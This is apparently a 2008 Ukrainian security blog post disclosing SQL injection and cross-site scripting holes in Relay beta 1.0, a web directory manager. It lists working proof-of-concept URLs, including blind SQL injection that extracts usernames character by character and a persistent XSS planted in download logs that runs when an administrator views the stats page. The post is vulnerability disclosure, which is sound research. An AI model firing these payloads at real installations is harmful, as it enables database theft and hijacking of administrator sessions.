Нові уразливості в Relay

23:53 22.01.2008

Нещодавно я вже писав про уразливості в Relay. І два дні тому, 20.01.2008, я знайшов нові SQL Injection та Cross-Site Scripting уразливості у веб додатку Relay (ajax directory manager).

SQL Injection:

http://site/relay/management/index.php?page=manage&module=users&action=details&uid=-1%20or%20id=1 http://site/relay/management/index.php?page=manage&module=users&action=details&uid=1%20and%20substring(username,1,1)=char(109)

http://site/relay/management/index.php?page=manage&module=clients&action=details&cid=-1%20or%20id=1 http://site/relay/management/index.php?page=manage&module=clients&action=details&cid=1%20and%20substring(version(),1,1)=3

XSS:

http://site/relay/management/index.php?page=manage&module=users&action=details&uid=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/relay/management/index.php?page=manage&module=clients&action=details&cid=%3Cscript%3Ealert(document.cookie)%3C/script%3E

XSS (Persistent):

http://site/relay/relay.php?relay=getFile&fileid=-1%20or%201=1/*%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразливість в логах, де зберігається інформація про файли, які були скачені. При перегляді логів адміном на сторінці http://site/relay/management/index.php?page=stats&module=gen& action=latest XSS код буде виконано.

Вразлива версія Relay beta 1.0 (та попередні версії). Про уразливості розробникам веб додатка я повідомлю найближчим часом.

This entry was posted on 23:53 22.01.2008 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.

You must be logged in to post a comment.

Websecurity - Веб безпека

Нові уразливості в Relay

Leave a Reply

Меню

Категорії

Останні повідомлення

Архів +-

Мета